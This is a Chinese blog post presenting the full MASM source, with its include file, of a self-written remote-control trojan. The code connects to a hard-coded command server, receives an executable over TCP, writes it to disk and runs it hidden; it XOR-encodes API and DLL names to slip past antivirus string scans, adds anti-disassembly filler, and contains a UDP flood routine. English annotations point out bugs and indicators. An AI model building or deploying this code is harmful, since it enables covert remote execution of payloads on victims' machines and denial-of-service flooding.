
自己前几天用MASM写的一个远控

最先是在看雪发的，新开空间我也没啥东西，只能拿这个凑数了。
;作者:落笔飞花笑百生
;日期:2014/12/20
;用处:练手
;写一个程序虽然很烂但是确实能学到很多,用汇编写程序能逼迫自己去学习以前高级语言中容易忽略的东西虽然还是不够。
;但是至少脱离了只能用别人封装好的库来写程序的恶性循环
;这个程序也没有了写下去的意思,该解决的都解决了我实在想不出来再写他具体能得到什么
;本来想把自己实现的getFUNCaddress加进去的,也没有这样做。
;DLL名称和函数名称由于直接这样写会被某些弱智杀软杀字符串没办法只能xor简单加密一下然后取地址再动态解密一下 这样过了表面
;二次开发的人注意:xor第一个字符不加密的

include androidprotect.inc          ; project include (presumably the INC file printed after "end winmain"): model, Winsock typedefs, globals
.code
dipx byte  "192.168.0.101",0        ; C2 host as text; start resolves it with m_gethostbyname. Note it sits in .code, not .data
;dipx byte "anyou5.com",0           ; commented-out alternative C2 host
ganraoz proc
ret                                 ; empty procedure; not referenced anywhere in the visible code ("ganrao" ~ "interference": presumably filler to alter the binary layout - unverified)

ganraoz endp
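_CalcCheckSum   proc        _lpsz,_dwSize
;-----------------------------------------------------------------------
; WORD _CalcCheckSum(const void *_lpsz, DWORD _dwSize)
; One's-complement sum of the buffer taken 16 bits at a time (the usual
; IP/ICMP/UDP header checksum): a trailing odd byte is added as-is, the
; 32-bit sum is folded into 16 bits, complemented and returned in eax
; (zero-extended, so the upper half of eax is clean).
; Not called anywhere in the visible code.
; Preserves every register except eax (pushad/popad); clobbers flags.
; Fixes vs. the old body: a size of 0 or 1 ran the word loop 2^32 times
; ("loop" with ecx == 0), and the fold added the high half only once, so a
; carry out of bit 15 could survive in eax (e.g. a sum of 1ffffh).
;-----------------------------------------------------------------------

                    local   @dwSize

                    pushad

                    xor     ebx,ebx                 ; ebx = running 32-bit sum
                    mov     esi,_lpsz               ; esi = next byte to add
                    cld                             ; lodsw/lodsb move forward
                    mov     ecx,_dwSize
                    shr     ecx,1                   ; ecx = number of whole 16-bit words
                    jz      no_words                ; size 0 or 1: nothing to do in the word loop

;********************************************************************
; accumulate every 16-bit word
;********************************************************************
word_loop:
                    lodsw
                    movzx   eax,ax
                    add     ebx,eax
                    dec     ecx
                    jnz     word_loop
no_words:

;********************************************************************
; a trailing single byte, if any, is added as well
;********************************************************************
                    test    _dwSize,1
                    jz      no_odd_byte
                    lodsb
                    movzx   eax,al
                    add     ebx,eax
no_odd_byte:

;********************************************************************
; fold the high 16 bits into the low 16 bits - twice, so the carry of the
; first fold is absorbed - then complement and return
;********************************************************************
                    mov     eax,ebx
                    shr     eax,16                  ; eax = high half
                    and     ebx,0ffffh              ; ebx = low half
                    add     eax,ebx                 ; at most 1fffeh
                    mov     ebx,eax
                    shr     ebx,16                  ; carry of the first fold (0 or 1)
                    and     eax,0ffffh
                    add     eax,ebx                 ; now fits in 16 bits
                    not     ax
                    movzx   eax,ax                  ; keep the upper half clean

                    mov     @dwSize,eax             ; carry the result across popad
                    popad
                    mov     eax,@dwSize
                    ret

_CalcCheckSum   endp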
udpattack proc
;-----------------------------------------------------------------------
; UDP flood towards udpip:udpport: opens a datagram socket and, while
; uptrue == 1, sends the current tick count as decimal text in a tight
; loop.  Not called anywhere in the visible code, and udpip/udpport/uptrue
; are never written here either (uptrue is initialised to 1 in the INC
; file), so the trigger presumably lives in a fuller build - unverified.
; Traffic shape a defender would see: a high rate of small UDP datagrams
; to a single destination whose payload is a short decimal integer.
; No arguments, no return value; eax/ecx/edx are not preserved.
;-----------------------------------------------------------------------
invoke m_socket,AF_INET, SOCK_DGRAM, 17              ; 17 = IPPROTO_UDP
mov udpsock,eax                                      ; INVALID_SOCKET is not checked
mov udpSin.sin_family, AF_INET  
invoke gethtons,udpport
mov udpSin.sin_port,ax  
invoke m_gethostbyname,offset udpip                  ; a NULL result is dereferenced below
mov eax,[eax+12]                                     ; hostent.h_addr_list
mov eax,[eax]                                        ;   first address pointer
mov eax,[eax]                                        ;   the 32-bit address
invoke m_inet_ntoa,eax                               ; binary -> text -> binary round trip (redundant)
invoke m_inet_addr,eax
mov udpSin.sin_addr.S_un.S_addr,eax
invoke m_setsockopt,udpsock,SOL_SOCKET,SO_SNDBUF,offset udpbuf,sizeof udpbuf   ; send-buffer size = value of udpbuf (0 unless set elsewhere)
.while byte ptr [uptrue]==1
invoke GetTickCount
invoke dwtoa,eax,offset udpbuff                      ; payload = tick count as decimal text
invoke lstrlen,offset udpbuff
invoke m_sendto,udpsock,offset udpbuff,eax,0,offset udpSin,sizeof udpSin   ; send errors are ignored
.endw
invoke m_closesocket,udpsock
ret

udpattack endp

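stringtodw proc uses ebx esi edi string:dword,strsiz:dword
;-----------------------------------------------------------------------
; DWORD stringtodw(const char *string, DWORD strsiz)
; Parses up to strsiz decimal ASCII digits starting at string and returns
; their value in eax, stopping early at the first NUL byte.
; As before there is no overflow check and no validation that the bytes
; really are '0'..'9' (each byte contributes byte - 30h).
; stdcall: ebx/esi/edi are now saved and restored (the old body clobbered
; all three), and strsiz == 0 returns 0 instead of letting the counter
; wrap around and parse until the NUL.
; Clobbers: ecx, flags.
;-----------------------------------------------------------------------
    xor     ebx,ebx                 ; ebx = accumulated value
    mov     edi,string              ; edi = current character
    mov     ecx,strsiz              ; ecx = characters remaining
    jecxz   done                    ; nothing to parse
nextchar:
    movzx   esi,byte ptr [edi]
    test    esi,esi
    jz      done                    ; NUL terminates early
    lea     eax,[ebx+ebx*4]         ; eax = ebx * 5
    lea     ebx,[esi+eax*2-30h]     ; ebx = ebx * 10 + (ch - '0')
    inc     edi
    dec     ecx
    jnz     nextchar
done:
    mov     eax,ebx
    ret
stringtodw endp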
xorstring proc dstring,dsize:dword
;-----------------------------------------------------------------------
; Decodes one obfuscated byte table (see the INC file) in place: every
; byte is XORed with 5 except byte 0, which is skipped because eax is
; incremented before the first XOR (the author's header note says the
; first character is stored unencrypted).  The loop still runs dsize
; times, so the last XOR hits the byte just past the table; the 2-byte
; "x?" pads that follow each table in the INC file absorb that write.
; This is what keeps the DLL and API names out of a plain string scan of
; the file: they only exist in memory after getproaddress has run, so an
; analyst has to look at a memory image or at the table bytes XOR 5.
; Clobbers: eax, ecx, flags.
;-----------------------------------------------------------------------
mov eax,dstring
mov ecx,dsize
@@:
inc eax
xor byte ptr [eax],5

loop @B

ret
xorstring endp
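gethtons proc port :dword
;-----------------------------------------------------------------------
; WORD gethtons(DWORD port) - host-to-network byte order for a 16-bit port
; In:   port (only the low 16 bits are used)
; Out:  eax = low 16 bits of port with the two bytes swapped, zero-extended
;       (callers store ax into sin_port)
; Clobbers: flags only (the old body also clobbered ecx).
; The old body read the argument as ss:[ebp+8], which silently depends on
; MASM's generated frame; naming the parameter is equivalent and robust.
;-----------------------------------------------------------------------
    movzx   eax,word ptr port       ; eax = port and 0ffffh
    rol     ax,8                    ; swap the two bytes of ax
    ret

gethtons endp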

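midstr proc a,b,cc,d:dword
;-----------------------------------------------------------------------
; void midstr(const BYTE *a, BYTE *b, DWORD cc, DWORD d)
; Copies bytes a[cc .. d-1] (d - cc bytes) to b.  No NUL terminator is
; written and b is not bounds-checked: the caller must make sure b has
; room for d - cc bytes (start clears its destination buffers with
; RtlZeroMemory before calling).
; Fixes vs. the old body: esi/edi were popped in the wrong order (the
; caller got them swapped), ebx was clobbered without being saved, and
; d < cc produced a huge count for rep movsb; that case now copies nothing.
; Clobbers: ecx, flags.
;-----------------------------------------------------------------------
    push    esi
    push    edi

    mov     ecx,d
    sub     ecx,cc                  ; ecx = number of bytes to copy
    jbe     done                    ; d <= cc (unsigned): empty range
    mov     esi,a
    add     esi,cc                  ; esi = &a[cc]
    mov     edi,b                   ; edi = b
    cld
    rep     movsb
done:
    pop     edi
    pop     esi
    ret

midstr endp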
ganraoy proc

ret                                 ; empty procedure; not referenced anywhere in the visible code (presumably layout filler - unverified)

ganraoy endp

start proc
;-----------------------------------------------------------------------
; Thread body of the C2 session (started by winmain via CreateThread).
; Flow, as written:
;   1. getproaddress (decode API names, mutex check, resolve ws2_32), WSAStartup
;   2. .repeat: connect to dipx:dport, then loop on m_recv:
;        "XZ<decimal>" -> parse the number into dFileSize, reply "GETPE!"
;        "MZ..."       -> write this buffer and every following receive to
;                         <GetTickCount>.exe in the current directory until
;                         GetFileSize == dFileSize, then WinExec it with
;                         SW_HIDE and reply "FILECSWB!"
;        anything else -> wait for the next message
;      A recv result <= 0 leaves the .while, closes the socket, sleeps 10 s
;      and reconnects; CLOSE is never set TRUE in the visible code, so the
;      .until never exits.
; Plain jmp/je are used to enter and leave the .while, so the high-level
; directives are not a reliable guide to the real control flow.
; Indicators visible in this listing: the fixed C2 address in dipx and port
; in dport, the case-insensitive "XZ"/"MZ" command prefixes, the "GETPE!"
; and "FILECSWB!" replies, and a dropped <tickcount>.exe in the current
; directory of the process.
;-----------------------------------------------------------------------
; entry point of the thread
invoke GetCommandLine                ; result unused
call $+5                             ; three call-to-next-instruction pushes that are never popped
call $+5                             ;   (presumably meant to confuse a disassembler; they only leave
call $+5                             ;   12 stale bytes on this thread's stack)

jmp xaxa                             ; jump to the next instruction: no effect
xaxa:
call getproaddress
invoke m_WSAStartup,0202h,offset WSAData
.repeat
invoke m_socket,AF_INET, SOCK_STREAM, IPPROTO_TCP
.if eax!=INVALID_SOCKET

mov hSock,eax
mov Sin.sin_family, AF_INET  
invoke gethtons,dport
mov Sin.sin_port,ax  
invoke m_gethostbyname,offset dipx   ; a NULL result is dereferenced below
mov eax,[eax+12]                     ; hostent.h_addr_list
mov eax,[eax]                        ;   first address pointer
mov eax,[eax]                        ;   the 32-bit address
invoke m_inet_ntoa,eax               ; binary -> text -> binary round trip (redundant)
invoke m_inet_addr,eax
mov Sin.sin_addr.S_un.S_addr,eax
invoke m_connect,hSock,addr Sin,sizeof Sin   ; result ignored; a failed connect surfaces as a failed m_recv

.endif                               ; on INVALID_SOCKET the stale hSock is still used below
recvloop:
invoke RtlZeroMemory,offset  flag,sizeof flag
invoke RtlZeroMemory,offset recvbuff,sizeof recvbuff
invoke m_recv,hSock,offset recvbuff,sizeof recvbuff,0
.while eax>0  &&eax!=INVALID_SOCKET &&eax!=SOCKET_ERROR 
invoke midstr,offset recvbuff,offset flag,0,2   ; flag = first two bytes of the message (flag was zeroed, so it is NUL-terminated)
invoke lstrcmpi,offset flag,offset xz
cmp eax,0
je xxz                               ; "XZ": announcement of the file size
invoke midstr,offset recvbuff,offset flag,0,2
invoke lstrcmpi,offset flag,offset pe
cmp eax,0
je fuckfile                          ; "MZ": first chunk of a PE image
jmp recvloop                         ; unknown prefix: wait for the next message
; write out the PE file
fuckfile:
invoke GetCurrentDirectory,260,offset currd
invoke GetTickCount
invoke dwtoa,eax,offset filename     ; filename = "<tickcount>.exe"
invoke lstrcat ,offset filename,$CTA0(".exe")
invoke lstrcat,offset currd,offset xiegang   ; xiegang ("slash") is an empty string in this paste, so no separator is inserted
invoke lstrcat,offset currd,offset filename
; build the name and path of the file to write
invoke DeleteFile,offset currd
; the data starts with MZ
invoke CreateFile,addr currd,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL
mov hfilehandle,eax                  ; INVALID_HANDLE_VALUE is not checked
invoke WriteFile,hfilehandle,offset recvbuff,sizeof recvbuff,offset oldwritebytes,NULL   ; always writes the whole 1024-byte buffer, not the received length
loopwrite:
invoke RtlZeroMemory,offset recvbuff,sizeof recvbuff
invoke m_recv,hSock,offset recvbuff,sizeof recvbuff,0   ; byte count / error not checked
        invoke SetFilePointer,hfilehandle,NULL,NULL,FILE_END
        invoke WriteFile,hfilehandle,offset recvbuff,sizeof recvbuff,offset oldwritebytes,NULL
        invoke GetFileSize,hfilehandle,NULL
        mov writebytes,eax
       cmp eax,dword ptr [dFileSize]
        je close                     ; only exact equality ends the loop; since every write is 1024 bytes, a dFileSize that is not a multiple of 1024 never matches
        jmp loopwrite

close:
invoke CloseHandle,hfilehandle
mov dword ptr [dFileSize],0; reset the expected size
invoke RtlZeroMemory,offset recvbuff,sizeof recvbuff
invoke WinExec,offset currd,SW_HIDE; run the dropped file once the transfer is done
invoke m_send,hSock,offset filecs,sizeof filecs,0
jmp recvloop; back to waiting for the next command
xxz:
invoke lstrlen,offset recvbuff
invoke midstr,offset recvbuff,offset dFileSize,2,eax   ; copies len-2 bytes into dFileSize, a 4-byte dword: a longer digit string overruns into the globals declared after it
invoke lstrlen,offset dFileSize
invoke stringtodw,offset dFileSize,eax
mov dword ptr [dFileSize],eax        ; the decimal text is replaced by its numeric value
invoke m_send,hSock,offset getpe,sizeof getpe,0
jmp recvloop
.endw

invoke m_closesocket,hSock
invoke Sleep,10000                   ; 10 s before the next connection attempt
.until CLOSE==TRUE
invoke m_WSACleanup  

start endp
winmain proc
;-----------------------------------------------------------------------
; Link-time entry point (see "end winmain").  Starts the C2 session
; (start) on a new thread and returns immediately; there is no
; ExitProcess here, so the process presumably stays alive on the worker
; thread - TODO confirm.  The thread handle is not kept or closed.
;-----------------------------------------------------------------------
invoke CreateThread,NULL,NULL,offset start,NULL,0,NULL; spin up the worker (C2) thread
ret

winmain endp
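dwtoa proc dwValue:DWORD, lpBuffer:DWORD
;-----------------------------------------------------------------------
; void dwtoa(DWORD dwValue, char *lpBuffer)
; Formats dwValue as a signed decimal string (values with bit 31 set get
; a leading '-', as before) into lpBuffer and NUL-terminates it.
; lpBuffer must hold at least 12 bytes ("-2147483648" plus NUL).
; Clobbers: eax, ecx, edx, flags; esi/edi are preserved.
; Fixes vs. the old body: the reciprocal multiply by 429496730 mis-rounds
; the first digit for magnitudes just below 2^31 (e.g. -2147483639 came
; out with a '/' as its last digit), and the signed ".while (eax > 0)"
; skipped the digit loop entirely for -2147483648 (the output was "-").
; A plain div by 10 and an unsigned loop test cover the whole range.
; The eight leading nops served no purpose and were dropped.
;-----------------------------------------------------------------------
    push esi
    push edi

    mov eax, dwValue
    mov edi, [lpBuffer]             ; edi = write cursor

    test eax, eax
    jnz sign

  zero:
    mov word ptr [edi], 30h         ; "0" plus NUL in one write
    jmp dw2asc

  sign:
    jns pos
    mov byte ptr [edi], '-'         ; negative: emit the sign, then format the magnitude
    neg eax                         ; for -2^31 this stays 80000000h, which the unsigned loop handles
    inc edi

  pos:
    mov ecx, 10
    mov esi, edi                    ; esi = first digit position (for the reversal)

  nextdigit:
    xor edx, edx
    div ecx                         ; eax = eax / 10, edx = eax mod 10
    add dl, '0'
    mov [edi], dl
    inc edi
    test eax, eax                   ; unsigned "while (eax != 0)"; eax > 0 on entry
    jnz nextdigit

    mov byte ptr [edi], 0           ; terminate the string

    ; The digits were produced least-significant first; reverse [esi, edi).
  reverse:
    cmp esi, edi
    jae dw2asc                      ; unsigned pointer compare
    dec edi
    mov al, [esi]
    mov ah, [edi]
    mov [edi], al
    mov [esi], ah
    inc esi
    jmp reverse

  dw2asc:

    pop edi
    pop esi

    ret

dwtoa endp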
ganraox proc
push eax                            ; the two pushes, two pops and mov eax,eax cancel out:
push eax                            ; the procedure has no effect on registers or memory
pop eax
pop eax
mov eax,eax
ret                                 ; not referenced anywhere in the visible code (presumably layout filler - unverified)

ganraox endp
ganraoxx proc
push eax                            ; same no-op body as ganraox: pushes, pops and mov eax,eax cancel out
push eax
pop eax
pop eax
mov eax,eax
ret                                 ; not referenced anywhere in the visible code (presumably layout filler - unverified)

ganraoxx endp
getproaddress proc
;-----------------------------------------------------------------------
; Resolves the Winsock imports at run time and enforces a single instance.
;   1. xorstring decodes the 13 byte tables from the INC file in place
;      (XOR 5, first byte untouched) into the DLL and API names noted
;      beside each call.
;   2. CreateMutex("bixanhuxakai"): on ERROR_ALREADY_EXISTS the process
;      exits.  The CloseHandle is passed "offset mxhand" (the address of
;      the variable), not the handle value, so nothing is actually closed.
;      The mutex name is a usable host-based indicator for this build.
;   3. LoadLibrary("ws2_32.dll") + GetProcAddress for each name into the
;      m_* pointers that the rest of the file invokes.  LoadLibrary is
;      called once per API (13 times; each call bumps the module reference
;      count), and neither the module handle nor any function pointer is
;      checked for NULL.
; Called from start with a plain call; no arguments, no return value.
;-----------------------------------------------------------------------
invoke xorstring,offset ws32dll,sizeof ws32dll     ; -> "ws2_32.dll"
invoke xorstring,offset wstp,sizeof wstp           ; -> "WSAStartup"
invoke xorstring,offset sock,sizeof sock           ; -> "socket"
invoke xorstring,offset getby,sizeof getby         ; -> "gethostbyname"
invoke xorstring,offset inoa,sizeof inoa           ; -> "inet_ntoa"
invoke xorstring,offset inaddr,sizeof inaddr       ; -> "inet_addr"
invoke xorstring,offset cont,sizeof cont           ; -> "connect"
invoke xorstring,offset recvx,sizeof recvx         ; -> "recv"
invoke xorstring,offset colses,sizeof colses       ; -> "closesocket"
invoke xorstring,offset wcl,sizeof wcl             ; -> "WSACleanup"
invoke xorstring,offset sed,sizeof sed             ; -> "send"
invoke xorstring,offset sot,sizeof sot             ; -> "setsockopt"
invoke xorstring,offset sendtot,sizeof sendtot     ; -> "sendto"

; the calls above decode the strings
invoke CreateMutex,NULL,NULL,$TA0("bixanhuxakai")  ; single-instance guard
mov mxhand,eax
invoke GetLastError
.if eax== ERROR_ALREADY_EXISTS
invoke CloseHandle,offset mxhand                   ; passes &mxhand rather than the handle
mov mxhand,0
invoke ExitProcess,NULL
.endif

invoke LoadLibrary,offset ws32dll                  ; every block below: LoadLibrary + GetProcAddress, no NULL checks
invoke GetProcAddress,eax,offset wstp
mov m_WSAStartup,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sock
mov m_socket,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset getby
mov m_gethostbyname,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset inoa
mov m_inet_ntoa,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset inaddr
mov m_inet_addr,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset cont
mov m_connect,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset recvx
mov m_recv,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset colses
mov m_closesocket,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset wcl
mov m_WSACleanup,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sed
mov m_send,eax

invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sendtot
mov m_sendto,eax

invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sot
mov m_setsockopt,eax
ret

getproaddress endp
ganrao proc
ret                                 ; empty procedure; not referenced anywhere in the visible code (presumably layout filler - unverified)

ganrao endp
end winmain                         ; link-time entry point is winmain above (CreateThread on start, then return)

下面是INC文件

.386                                ; 32-bit code
.model flat,stdcall                 ; flat model; stdcall: callee pops its arguments, ebx/esi/edi/ebp are callee-saved
option casemap:none                 ; symbols are case-sensitive
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include C:Users巫师DesktopRadASMmasm32macrosStrings.mac   ; masm32 Strings.mac ($CTA0/$TA0 used in .code); the path separators were lost in this paste

; Function-pointer types for the ws2_32 APIs that getproaddress resolves at run time:
; one "proto" per signature, then the pointer typedef the m_* globals use with invoke.
_WSAStartup2 typedef proto :dword,:dword
_WSAStartup typedef ptr _WSAStartup2
_socket2 typedef proto :dword,:dword,:dword
_socket typedef ptr _socket2
_gethostbyname2 typedef proto :dword
_gethostbyname typedef ptr _gethostbyname2
_inet_ntoa2 typedef proto :dword
_inet_ntoa typedef ptr _inet_ntoa2
_inet_addr2 typedef proto :dword
_inet_addr typedef ptr _inet_addr2
_connect2 typedef proto :dword,:dword,:dword
_connect typedef ptr _connect2
_recv2 typedef proto :dword,:dword,:dword,:dword
_recv typedef ptr _recv2
_closesocket2 typedef proto :dword
_closesocket typedef ptr _closesocket2
_WSACleanup2 typedef proto
_WSACleanup typedef ptr _WSACleanup2
_send2 typedef proto :dword,:dword,:dword,:dword
_send typedef ptr _send2
_sendto2 typedef proto :dword,:dword,:dword,:dword,:dword,:dword
_sendto typedef ptr _sendto2
_setsockopt2 typedef proto :dword,:dword,:dword,:dword,:dword
_setsockopt typedef ptr _setsockopt2
; prototypes for the procedures in the .code file that are invoked before they are defined
getproaddress proto 
dwtoa proto :dword,:dword
gethtons proto:dword
.data?                              ; uninitialised data
currd byte 260 dup (?)              ; current directory, then the full path of the dropped file
filename byte  50 dup (?)           ; "<GetTickCount>.exe"
ipsize byte 50 dup (?)              ; not referenced in the visible code
recvbuff byte 1024 dup (?); 1 KB receive buffer (also the unit every WriteFile in start uses)
Sin      sockaddr_in <>             ; TCP C2 endpoint
;UDP
udpSin      sockaddr_in <>          ; udpattack destination
udpbuff byte  200 dup(?)            ; udpattack payload (tick count as decimal text)
udpbuf dd 00                        ; passed as the SO_SNDBUF value; never written in the visible code
udpport dd 00                       ; udpattack port; never written in the visible code
udpip byte 50 dup (?)               ; udpattack host name; never written in the visible code
udpsock dd 00
uptrue byte 01h                     ; udpattack loops while this is 1; nothing in the visible code clears it
;UDP
WSAData  WSADATA <>
m_WSAStartup _WSAStartup ?          ; the m_* pointers below are filled in by getproaddress
m_socket _socket ?
m_gethostbyname _gethostbyname ?
m_inet_addr _inet_addr ?
m_inet_ntoa _inet_ntoa ?
m_connect _connect ?
m_recv _recv ?
m_closesocket _closesocket ?
m_WSACleanup _WSACleanup ?
m_send _send ?
m_setsockopt _setsockopt ?
m_sendto _sendto ?
.data                               ; initialised, writable data (the byte tables below are decoded in place, so they must be writable)
hfilehandle dd 00                   ; handle of the file being dropped
writebytes dd 00                    ; last GetFileSize result
oldwritebytes dd 00                 ; lpNumberOfBytesWritten for WriteFile
dFileSize dd 00                     ; expected size of the incoming file; start first copies the decimal text of the "XZ" message here (only 4 bytes of room), then overwrites it with the parsed value
mxhand dd 00                        ; mutex handle
xz byte "XZ",0                      ; command prefix: file-size announcement (compared case-insensitively)
pe byte "MZ",0                      ; command prefix: start of a PE image
flag byte 5 dup (?)                 ; first two bytes of each message, NUL-terminated
dport dword 666                     ; C2 TCP port
CLOSE BOOL FALSE                    ; loop-exit flag for start; never set TRUE in the visible code
filecs byte "FILECSWB!",0           ; reply sent after the dropped file has been executed
getpe byte "GETPE!",0               ; reply sent after an "XZ" message
xiegang byte "",0                   ; "slash": path separator appended between directory and file name; empty in this paste (a backslash was presumably lost, as in the include path above)
hSock dd 00                         ; C2 socket
datalengh dd 00                     ; not referenced in the visible code
; The 13 tables below hold the DLL/API names obfuscated with XOR 5 (byte 0 stored as-is, 005h = encoded NUL).
; Each is followed by a 2-byte pad because xorstring's loop also XORs the byte just past the table.
ws32dll byte 077h, 076h, 037h, 05Ah, 036h, 037h, 02Bh, 061h, 069h, 069h, 0005h     ; "ws2_32.dll"
xa byte 00,00
wstp byte   0057h ,0056h ,0044h ,0056h ,0071h, 0064h ,0077h ,0071h ,0070h ,0075h ,0005h   ; "WSAStartup"
xb byte 00,00
sock byte 073h ,06Ah ,066h ,06Eh ,060h ,0071h ,005h       ; "socket"
xc byte 00,00
getby byte 0067h ,0060h ,0071h ,006Dh ,006Ah ,0076h ,0071h ,0067h ,007Ch ,006Bh ,0064h ,068h ,060h ,005h   ; "gethostbyname"

xd byte 00,00
inoa byte 0069h ,006Bh ,0060h ,0071h ,005Ah ,006Bh ,0071h ,006Ah ,0064h ,005h   ; "inet_ntoa"

xe byte 00,00
inaddr byte  0069h, 006Bh, 0060h ,0071h, 005Ah, 0064h ,0061h, 0061h, 0077h, 0005h     ; "inet_addr"

xf byte 00,00
cont byte 0063h ,006Ah ,006Bh ,006Bh, 0060h, 0066h, 0071h ,0005h     ; "connect"

xg byte 00,00
recvx byte 0072h ,0060h ,0066h ,0073h ,0005h   ; "recv"

xh byte 00,00
colses byte  0063h ,0069h ,006Ah ,0076h ,0060h ,0076h, 006Ah, 0066h ,006Eh ,0060h ,0071h ,0005h   ; "closesocket"

xi byte 00,00
wcl byte  0057h, 0056h ,0044h, 0046h, 0069h ,060h ,0064h ,006Bh ,0070h ,0075h ,0005h   ; "WSACleanup"

xj byte 00,00
sed byte   0073h, 0060h, 006Bh, 0061h, 0005h   ; "send"

xk byte 00,00
sot byte  073h,060h,071h,076h,06Ah,066h,06Eh,06Ah,075h,071h,005h   ; "setsockopt"
xl byte 00,00
sendtot byte  073h,060h,06Bh,061h,071h,06Ah,005h   ; "sendto"
xm byte 00,00